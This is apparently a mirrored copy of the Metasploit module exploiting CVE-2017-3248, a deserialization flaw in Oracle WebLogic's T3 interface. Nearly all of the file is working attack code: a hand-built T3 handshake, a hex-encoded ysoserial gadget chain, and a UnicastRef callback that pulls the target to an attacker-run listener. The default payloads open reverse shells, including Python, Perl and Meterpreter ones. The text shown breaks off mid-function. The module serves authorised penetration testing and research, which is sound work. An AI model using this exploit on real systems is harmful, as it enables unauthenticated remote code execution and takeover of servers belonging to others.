Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::TcpServer

11
  # include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::Powershell

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Oracle Weblogic Server Deserialization RCE - RMI UnicastRef',

19
        'Description' => %q{

20
          An unauthenticated attacker with network access to the Oracle Weblogic Server T3

21
          interface can send a serialized object (sun.rmi.server.UnicastRef)

22
          to the interface to execute code on vulnerable hosts.

23
        },

24
        'Author' => [

25
          'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)

26
          'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security

27
          'Aaron Soto'         # Reverse Engineering JSO and ysoserial blobs

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          ['CVE', '2017-3248']

32
        ],

33
        'Privileged' => false,

34
        'Platform' => %w{unix win solaris},

35
        'Targets' => [

36
          [

37
            'Unix',

38
            'Platform' => 'unix',

39
            'Arch' => ARCH_CMD,

40
            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },

41
            'Payload' => {

42
              'Encoder' => 'cmd/ifs',

43
              'BadChars' => ' ',

44
              'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'python' }

45
            }

46
          ],

47
          [

48
            'Windows',

49
            'Platform' => 'win',

50
            'Payload' => {},

51
            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }

52
          ],

53
          [

54
            'Solaris',

55
            'Platform' => 'solaris',

56
            'Arch' => ARCH_CMD,

57
            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },

58
            'Payload' => {

59
              'Space' => 2048,

60
              'DisableNops' => true,

61
              'Compat' =>

62
                {

63
                  'PayloadType' => 'cmd',

64
                  'RequiredCmd' => 'generic perl telnet',

65
                }

66
            }

67
          ]

68
        ],

69
        'DefaultTarget' => 0,

70
        'DefaultOptions' => {

71
          'WfsDelay' => 12

72
        },

73
        'DisclosureDate' => '2017-01-25',

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81


82
    register_options([Opt::RPORT(7001)])

83
  end

84


85
=begin   This check is currently incompatible with the Tcp mixin.  :-(

86
  def check

87
    resp = send_request_cgi(

88
      'method' => 'GET',

89
      'uri'    => '/console/login/LoginForm.jsp'

90
    )

91


92
    return CheckCode::Unknown unless resp && resp.code == 200

93


94
    unless resp.body.include?('Oracle WebLogic Server Administration Console')

95
      vprint_warning("Oracle WebLogic Server banner cannot be found")

96
      return CheckCode::Unknown

97
    end

98


99
    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body

100
    unless version

101
      vprint_warning("Oracle WebLogic Server version cannot be found")

102
      return CheckCode::Unknown

103
    end

104


105
    version = Rex::Version.new(version)

106
    vprint_good("Detected Oracle WebLogic Server Version: #{version}")

107
    case

108
    when version.to_s.start_with?('10.3')

109
      return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')

110
    when version.to_s.start_with?('12.1.3')

111
      return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')

112
    when version.to_s.start_with?('12.2')

113
      return CheckCode::Appears unless version > Rex::Version.new('12.2.1.1')

114
    end

115


116
    return CheckCode::Safe

117
  end

118
=end

119


120
  def gen_resp

121
    if target.name == 'Windows'

122
      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })

123
      mycmd = pwrshl.each_byte.map { |b| b.to_s(16) }.join

124
    elsif target.name == 'Unix' || target.name == 'Solaris'

125
      nix_cmd = payload.encoded

126
      mycmd = nix_cmd.each_byte.map { |b| b.to_s(16) }.join

127
    end

128


129
    serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4, '0')

130
    serialized_cmd << mycmd

131


132
    # Response data taken from JRMPListener generated data:

133
    # java -cp ysoserial-0.0.5-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 calc.exe

134
    # Modified captured network traffic bytes. Patch in command to run

135
    # TODO: Migrate this functionality to the new JavaDeserialization utilities

136
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'

137
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'

138
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'

139
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'

140
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'

141
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'

142
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'

143
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'

144
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'

145
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'

146
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'

147
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'

148
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'

149
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'

150
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'

151
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'

152
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'

153
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'

154
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'

155
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'

156
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'

157
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'

158
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'

159
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'

160
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'

161
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'

162
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'

163
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'

164
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'

165
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'

166
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'

167
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'

168
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'

169
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'

170
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'

171
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'

172
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'

173
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'

174
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'

175
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'

176
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'

177
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'

178
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'

179
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'

180
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'

181
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'

182
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'

183
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'

184
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'

185
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'

186
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'

187
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'

188
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'

189
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'

190
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'

191
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'

192
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'

193
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'

194
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'

195
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'

196
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'

197
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'

198
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'

199
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'

200
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'

201
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'

202
    @resp << '673badd256e7e91d7b470200007078700000000174'

203


204
    @resp << serialized_cmd

205


206
    @resp << '74'

207
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'

208
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'

209
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'

210
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'

211
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'

212
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'

213
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'

214
    @resp << '7e005a'

215
  end

216


217
  def on_client_connect(client)

218
    # Make sure to only sent one meterpreter payload to a host.

219
    # (or as long as the server was listening).

220
    vprint_status("Comparing host: #{client.peerhost}")

221
    if @met_sent.include?(client.peerhost) then return end

222


223
    @met_sent << client.peerhost

224


225
    print_status("Sending payload to client: #{client.peerhost}")

226


227
    # Response format determined by watching network traffic

228
    accept_conn = '4e00'

229
    raccept_conn = client.peerhost.each_byte.map { |b| b.to_s(16) }.join

230
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2, '0')

231
    accept_conn << raccept_conn

232
    accept_conn << '0000'

233
    accept_conn << client.peerport.to_s(16).rjust(4, '0')

234


235
    client.put([accept_conn].pack('H*'))

236
    client.get_once

237
    client.get_once

238
    client.put([@resp].pack('H*'))

239
    client.get_once

240


241
    service.close_client(client)

242
  end

243


244
  def t3_handshake

245
    # retrieved from network traffic

246
    shake = "t3 12.2.1\n"

247
    shake << "AS:255\n"

248
    shake << "HL:19\n"

249
    shake << "MS:10000000\n\n"

250


251
    sock.put(shake)

252
    sleep(1)

253
    sock.get_once

254
  end

255


256
  def build_t3_request_object

257
    # T3 request serialized data

258
    # retrieved by watching network traffic

259
    # This is a proprietary, undocumented protocol

260
    data = '000005c3' # lenght of the packet

261
    data << '01'                                           # CMD_IDENTIFY_REQUEST

262
    data << '65'                                           # QOS

263
    data << '01'                                           # Flags:

264
    #   CONTEXT_JVMID_FLAG = 1 (has JVMIDs)

265
    #   CONTEXT_TX_FLAG = 2

266
    #   CONTEXT_TRACE_FLAG = 4

267
    #   CONTEXT_EXTENDED_FLAG = 8

268
    #   CONTEXT_EXTENDED_USER_FLAG = 16

269
    data << 'ffffffff'                                     # response id

270
    data << 'ffffffff'                                     # invocable id

271
    data << '0000006a'                                     # abbrev offset

272
    data << '0000ea60'                                     # reconnect timeout ??

273


274
    # TODO: WHAT DOES THIS DO?  CAN WE RANDOMIZE ANY OF IT?

275
    data << '0000001900937b484a56fa4a777666f581daa4f5b9'

276
    data << '0e2aebfc607499b402797372007872017872027870'

277
    data << '0000000a0000000300000000000000060070707070'

278
    data << '70700000000a000000030000000000000006007006'

279


280
    data << 'fe010000'                                     # ----- separator -----

281


282
    data << 'aced0005'                                     # JSO v5 header

283
    data << '73'                                           # object header

284
    data << '72001d'                                       # className (29 bytes):

285
    data << '7765626c6f6769632e726a766d2e436c617373'       #   weblogic.rjvm.ClassTableEntry

286
    data << '5461626c65456e747279'                         #   (continued)

287
    data << '2f52658157f4f9ed'                             #   serialVersionUID

288
    data << '0c00007870'                                   #   remainder of object header

289
    data << '72'                                           # object header

290
    data << '00247765626c6f6769632e636f6d6d6f6e2e696e74'   #   className (36 bytes): weblogic.common.internal.PackageInfo

291
    data << '65726e616c2e5061636b616765496e666f'           #   (continued)

292
    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID

293
    data << '02'                                           #   SC_SERIALIZABLE

294
    data << '0008'                                         #   fieldCount = 8

295
    data << '4900056d616a6f72'                             #     0: Int: major

296
    data << '4900056d696e6f72'                             #     1: Int: minor

297
    data << '49000c726f6c6c696e675061746368'               #     2: Int rollingPatch

298
    data << '49000b736572766963655061636b'                 #     3: Int: servicePack

299
    data << '5a000e74656d706f726172795061746368'           #     4: Bool: temporaryPatch

300
    data << '4c0009696d706c5469746c65'                     #     5: Obj: implTitle

301
    data << '7400124c6a6176612f6c616e672f537472696e673b'   #        java/lang/String

302
    data << '4c000a696d706c56656e646f72'                   #     6: Obj: implVendor

303
    data << '71007e0003'                                   #        (Handle) 0x007e0003

304
    data << '4c000b696d706c56657273696f6e'                 #     7: Obj: implVersion

305
    data << '71007e0003'                                   #        (Handle) 0x007e0003

306
    data << '78707702000078'                               #   block footers

307


308
    data << 'fe010000'                                     # ----- separator -----

309


310
    data << 'aced0005'                                     # JSO v5 header

311
    data << '7372'                                         # object header

312
    data << '001d7765626c6f6769632e726a766d2e436c6173'     # className (29 bytes): weblogic.rjvm.ClassTableEntry

313
    data << '735461626c65456e747279'                       #    (continued)

314
    data << '2f52658157f4f9ed'                             # serialVersionUID

315
    data << '0c'                                           # EXTERNALIZABLE | BLOCKDATA

316
    data << '00007870'                                     # remainder of object header

317
    data << '72'                                           # object header

318
    data << '00247765626c6f6769632e636f6d6d6f6e2e696'      # className (36 bytes): weblogic.common.internal.VersionInfo

319
    data << 'e7465726e616c2e56657273696f6e496e666f'        #    (continued)

320
    data << '972245516452463e'                             # serialVersionUID

321
    data << '02'                                           # SC_SERIALIZABLE

322
    data << '0003'                                         #   fieldCount = 3

323
    data << '5b0008'                                       #   array header (8 bytes)

324
    data << '7061636b61676573'                             #     ARRAY NAME = 'packages'

325
    data << '740027'                                       #     TC_STRING className1 (39 bytes)

326
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'       #       weblogic/common/internal/PackageInfo

327
    data << '6e7465726e616c2f5061636b616765496e666f'       #       (continued)

328
    data << '3b'                                           #       (continued)

329
    data << '4c000e'                                       #   object header (14 bytes)

330
    data << '72656c6561736556657273696f6e'                 #     releaseVersion

331
    data << '740012'                                       #     TC_STRING (18 bytes)

332
    data << '4c6a6176612f6c616e672f537472696e673b'         #       versionInfoAsBytes

333
    data << '5b0012'                                       #   array header (18 bytes)

334
    data << '76657273696f6e496e666f41734279746573'         #     ARRAY NAME = java/lang/String;

335
    data << '740002'                                       #     TC_STRING (2 bytes)

336
    data << '5b42'                                         #       0x5b42 = [B

337
    data << '78'                                           # block footer

338


339
    data << '720024'                                       # class (36 bytes)

340
    data << '7765626c6f6769632e636f6d6d6f6e2e696e'         #   weblogic.common.internal.PackageInfo

341
    data << '7465726e616c2e5061636b616765496e666f'         #   (continued)

342
    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID

343


344
    data << '02'                                           #   SC_SERIALIZABLE

345
    data << '0008'                                         #   fieldCount = 8

346
    data << '4900056d616a6f72'                             #   0: Int: major

347
    data << '4900056d696e6f72'                             #   1: Int: minor

348
    data << '49000c726f6c6c696e675061746368'               #   2: Int rollingPatch

349
    data << '49000b736572766963655061636b'                 #   3: Int: servicePack

350
    data << '5a000e74656d706f726172795061746368'           #   4: Bool: temporaryPatch

351
    data << '4c0009696d706c5469746c65'                     #   5: Obj: implTitle

352
    data << '71'                                           #      TC_REFERENCE

353
    data << '007e0004'                                     #      Handle = 0x007e0004

354
    data << '4c000a696d706c56656e646f72'                   #   6: Obj: implVendor

355
    data << '71'                                           #      TC_REFERENCE

356
    data << '007e0004'                                     #      Handle = 0x007e0004

357
    data << '4c000b696d706c56657273696f6e'                 #   7: Obj: implVersion

358
    data << '71'                                           #      TC_REFERENCE

359
    data << '007e0004'                                     #      Handle = 0x007e0004

360
    data << '78'                                           # class footer

361
    data << '70'                                           # TC_NULL

362
    data << '77020000'                                     # BLOCKDATA (2 bytes): 0x0000

363
    data << '78'                                           # block footer

364


365
    data << 'fe010000'                                     # ----- separator -----

366


367
    data << 'aced0005'                                     # JSO v5 header

368
    data << '73'                                           # object header

369
    data << '72001d'                                       # className (29 bytes):

370
    data << '7765626c6f6769632e726a766d2e436c617373'       #   weblogic.rjvm.ClassTableEntry

371
    data << '5461626c65456e747279'                         #   (continued)

372
    data << '2f52658157f4f9ed'                             #   serialVersionUID

373
    data << '0c00007870'                                   #   remainder of object header

374
    data << '720021'                                       # className (33 bytes)

375
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'       #   weblogic.common.internal.PeerInfo

376
    data << '65726e616c2e50656572496e666f'                 #   (continued)

377
    data << '585474f39bc908f1'                             #   serialVersionUID

378
    data << '02'                                           #   SC_SERIALIZABLE

379
    data << '0006'                                         #   fieldCount = 6

380
    data << '4900056d616a6f72'                             #     0: Int: major

381
    data << '4900056d696e6f72'                             #     1: Int: minor

382
    data << '49000c726f6c6c696e675061746368'               #     2: Int rollingPatch

383
    data << '49000b736572766963655061636b'                 #     3: Int: servicePack

384
    data << '5a000e74656d706f726172795061746368'           #     4: Bool: temporaryPatch

385
    data << '5b00087061636b61676573'                       #     5: Array: packages

386
    data << '740027'                                       #        TC_STRING (39 bytes)

387
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'       #        Lweblogic/common/internal/PackageInfo;

388
    data << '6e7465726e616c2f5061636b616765496e666f'       #        (continued)

389
    data << '3b'                                           #        (continued)

390
    data << '78'                                           # block footer

391
    data << '720024'                                       # class (36 bytes)

392
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'       #   Lweblogic/common/internal/PackageInfo;

393
    data << '65726e616c2e56657273696f6e496e666f'           #   (continued)

394
    data << '972245516452463e'                             #   serialVersionUID

395
    data << '02'                                           #   SC_SERIALIZABLE

396
    data << '0003'                                         #   fieldCount = 3

397
    data << '5b0008'                                       #   0: Array

398
    data << '7061636b6167657371'                           #      packages

399
    data << '007e0003'                                     #      Handle = 0x00730003

400
    data << '4c000e72656c6561736556657273696f6e'           #   1: Obj: releaseVersion

401
    data << '7400124c6a6176612f6c616e672f537472696e673b'   #      Ljava/lang/String;

402
    data << '5b001276657273696f6e496e666f41734279746573'   #   2: Array: versionInfoAsBytes

403
    data << '740002'                                       #      TC_STRING (2 bytes)

404
    data << '5b42'                                         #      VALUE = 0x5b42 = [B

405
    data << '78'                                           # block footer

406
    data << '720024'                                       # class: (36 bytes)

407
    data << '7765626c6f6769632e636f6d6d6f6e2e696e746572'   #   Name = weblogic.common.internal.PackageInfo

408
    data << '6e616c2e5061636b616765496e666f'               #   (continued)

409
    data << 'e6f723e7b8ae1ec9'                             #   serialVersionUID

410
    data << '02'                                           #   SC_SERIALIZABLE

411
    data << '0008'                                         #   fieldCount = 8

412
    data << '4900056d616a6f72'                             #   0: Int: major

413
    data << '4900056d696e6f72'                             #   1: Int: minor

414
    data << '49000c726f6c6c696e675061746368'               #   2: Int rollingPatch

415
    data << '49000b736572766963655061636b'                 #   3: Int: servicePack

416
    data << '5a000e74656d706f726172795061746368'           #   4: Bool: temporaryPatch

417
    data << '4c0009696d706c5469746c65'                     #   5: Obj: implTitle

418
    data << '71'                                           #      TC_REFERENCE

419
    data << '007e0005'                                     #      Handle = 0x007e0005

420
    data << '4c000a696d706c56656e646f72'                   #   6: Obj: implVendor

421
    data << '71'                                           #      TC_REFERENCE

422
    data << '007e0005'                                     #      Handle = 0x007e0005

423
    data << '4c000b696d706c56657273696f6e'                 #   7: Obj: implVersion

424
    data << '71'                                           #      TC_REFERENCE

425
    data << '007e0005'                                     #      Handle = 0x007e0005

426
    data << '78'                                           # class footer

427
    data << '707702000078'                                 # block footers

428


429
    data << 'fe00ff'                                       # whatever this cruft is again

430


431
    data << 'fe010000'                                     # ----- separator -----

432


433
    # weblogic.rjvm.JVMID object

434
    data << 'aced0005'                                     # JSO v5 header

435
    data << '73'                                           # object header

436
    data << '720013'                                       #   class (19 bytes)

437
    data << '7765626c6f6769632e726a766d2e4a564d4944'       #   name = 'weblogic.rjvm.JVMID'

438
    data << 'dc49c23ede121e2a'                             #   serialVersionUID

439
    data << '0c'                                           #   EXTERNALIZABLE | BLOCKDATA

440
    data << '0000'                                         #   fieldCount = 0   (!!!)

441
    data << '78'                                           # block footer

442
    data << '70'                                           # NULL

443
    data << '7750'                                         # block header (80 bytes)

444
    data << '21'                                           #   !

445
    data << '000000000000000000'                           #   9 NULL BYTES

446
    data << '0d'                                           #   \n

447
    # data << '3139322e3136382e312e323237'                  #   original PoC string = 192.168.1.227

448
    data << '3030302e3030302e3030302e30' #   new string = 000.000.000.0

449
    #      (must be an IP, and length isn't trivially editable)

450
    data << '00'                                           #   \0

451
    data << '12'                                           #   strLength = 18 bytes

452
    # data << '57494e2d4147444d565155423154362e6568'        #   original str = WIN-AGDMVQUB1T6.eh

453
    data << rand_text_alphanumeric(18).unpack('H*')[0]

454
    data << '83348cd6'                                     #   ??? UNKNOWN ???  (Note: Cannot be randomized)

455
    data << '000000070000'                                 #   ??? UNKNOWN ???

456
    data << rport.to_s(16).rjust(4, '0')                   #   callback port

457
    data << 'ffffffffffffffffffffffffffffffffffffff'       #   ??? UNKNOWN ???

458
    data << 'ffffffffff'                                   #   ??? UNKNOWN ???

459
    data << '78'                                           # block footer

460


461
    data << 'fe010000'                                     # ----- separator -----

462


463
    # weblogic.rjvm.JVMID object

464
    data << 'aced0005'                                     # JSO v5 header

465
    data << '73'                                           # object header

466
    data << '72'                                           #   class

467
    data << '00137765626c6f6769632e726a766d2e4a564d4944'   #   Name: weblogic.rjvm.JVMID

468
    data << 'dc49c23ede121e2a'                             #   serialVersionUID

469
    data << '0c'                                           #   EXTERNALIZABLE | BLOCKDATA

470
    data << '0000'                                         #   fieldCount = 0

471
    data << '78'                                           # end block

472
    data << '70'                                           # TC_NULL

473
    data << '77'                                           # block header

474
    data << '20'                                           #   length = 32 bytes

475
    data << '0114dc42bd071a772700'                         #     ??? UNKNOWN ???

476
    # data << rand_text_alphanumeric(10).unpack('H*')[0]    #     (NOTE: RANDOMIZAITON BREAKS THINGS)

477
    data << '0d' #     \n

478
    # data << '3234322e3231342e312e323534'                  #     original string = 242.214.1.254

479
    data << '3030302e3030302e3030302e30' #     new string = 000.000.000.0

480
    #      (must be an IP, and length isn't trivially editable)

481
    # data << '61863d1d'                                    #     original string = ??? UNKNOWN ???

482
    data << rand_text_alphanumeric(4).unpack('H*')[0]      #     new = randomized

483
    data << '00000000'                                     #     NULL BYTES

484
    data << '78'                                           # block footer

485


486
    sock.put([data].pack('H*'))

487
    sleep(1)

488
    sock.get_once

489
  end

490


491
  def send_payload_objdata

492
    shost = srvhost

493
    if ['0.0.0.0', '127.0.0.1', '::'].include?(shost)

494
      shost = Rex::Socket.source_address

495
    end

496


497
    # JRMPClient payload generated from ysoserial:

498
    # Patch in srvhost and srvport

499
    # TODO: Migrate this functionality to the new JavaDeserialization utilities

500
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'

501
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'

502
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'

503


504
    payload << 'fe010000'                                  # ----- separator -----

505


506
    payload << 'aced0005'                                  # JSO v5 header

507
    payload << '73'                                        # object header

508
    payload << '72'                                        #   class

509
    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry

510
    payload << '73735461626c65456e747279'                  #     (cont)

511
    payload << '2f52658157f4f9ed'                          #   serialVersionUID

512
    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA

513
    payload << '0000'                                      #   fieldCount = 0

514
    payload << '7870'                                      #   remaining object header

515
    payload << '72'                                        # class header

516
    payload << '00025b42'                                  #   Name: 0x5b42

517
    payload << 'acf317f8060854e0'                          #   serialVersionUID

518
    payload << '02'                                        #   SERIALIZABLE

519
    payload << '0000'                                      #   fieldCount = 0

520
    payload << '7870'                                      #   class footer

521
    payload << '77'                                        # block header

522
    payload << '020000'                                    #   contents = 0x0000

523
    payload << '78'                                        #   block footer

524


525
    payload << 'fe010000'                                  # ----- separator -----

526


527
    payload << 'aced0005'                                  # JSO v5 header

528
    payload << '73'                                        # object header

529
    payload << '72'                                        #   class

530
    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry

531
    payload << '73735461626c65456e747279'                  #     (cont)

532
    payload << '2f52658157f4f9ed'                          #   serialVersionUID

533
    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA

534
    payload << '0000'                                      #   fieldCount = 0

535
    payload << '7870'                                      #   remaining object header

536
    payload << '72'                                        # class header

537


538
    payload << '00135b4c6a6176612e6c616e672e4f626a'        #   Name: [Ljava.lang.Object;

539
    payload << '6563743b'                                  #     (cont)

540
    payload << '90ce589f1073296c'                          #   serialVersionUID

541
    payload << '02'                                        #   SERIALIZABLE

542
    payload << '0000'                                      #   fieldCount = 0

543
    payload << '7870'                                      #   remaining object header

544
    payload << '77'                                        # block header

545
    payload << '020000'                                    #   contents = 0x0000

546
    payload << '78'                                        #   block footer

547


548
    payload << 'fe010000'                                  # ----- separator -----

549


550
    payload << 'aced0005'                                  # JSO v5 header

551
    payload << '73'                                        # object header

552
    payload << '72'                                        #   class

553


554
    payload << '001d7765626c6f6769632e726a766d2e436c61'    #   Name: weblogic.rjvm.ClassTableEntry

555
    payload << '73735461626c65456e747279'                  #     (cont)

556
    payload << '2f52658157f4f9ed'                          #   serialVersionUID

557
    payload << '0c'                                        #   SERIALIZABLE | BLOCKDATA

558
    payload << '0000'                                      #   fieldCount = 0

559
    payload << '7870'                                      #   block footer

560
    payload << '72'                                        # class header

561
    payload << '00106a6176612e7574696c2e566563746f72'      #   Name: java.util.Vector

562
    payload << 'd9977d5b803baf01'                          #   serialVersionUID

563
    payload << '03'                                        #   WRITE_METHOD | SERIALIZABLE

564
    payload << '0003'                                      #   fieldCount = 3

565
    payload << '4900116361706163697479496e6372656d656e74'  #   0: Int: capacityIncrement

566
    payload << '49000c656c656d656e74436f756e74'            #   1: Int: elementCount

567
    payload << '5b000b656c656d656e7444617461'              #   2: Array: elementData

568
    payload << '7400135b4c6a6176612f6c616e672f4f626a6563'  #   3: String: [Ljava/lang/Object;

569
    payload << '743b'                                      #      (cont)

570
    payload << '7870'                                      #   remaining object header

571
    payload << '77'                                        # block header

572
    payload << '020000'                                    #   contents = 0x0000

573
    payload << '78'                                        #   block footer

574


575
    payload << 'fe010000'                                  # ----- separator -----

576


577
    # manually generated payload using an UnicastRef object

578
    # needed parameters are patched in runtime

579
    payload << 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265'

580
    payload << '676973747279787200176a6176612e6c616e672e7265666c6563742e50726f78'

581
    payload << '79e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265'

582
    payload << '666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a61'

583
    payload << '76612e726d692e7365727665722e52656d6f74654f626a656374496e766f6361'

584
    payload << '74696f6e48616e646c657200000000000000020200007872001c6a6176612e72'

585
    payload << '6d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300'

586
    payload << '00787077'

587
    # serialize the srvhost manually

588
    unicast_srvhost = shost.each_byte.map { |b| b.to_s(16) }.join

589
    unicast_dat = '000a556e696361737452656600'

590
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2, '0')

591
    unicast_dat << unicast_srvhost

592
    unicast_dat << '0000'

593
    unicast_dat << srvport.to_s(16).rjust(4, '0')

594
    # unique identifier (for multiple executions)

595
    rand_id = rand(1..65535)

596
    unicast_dat << '000000006133'

597
    unicast_dat << rand_id.to_s(16).rjust(4, '0')

598
    unicast_dat << '00000000000000000000000000000078'

599
    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2, '0')

600
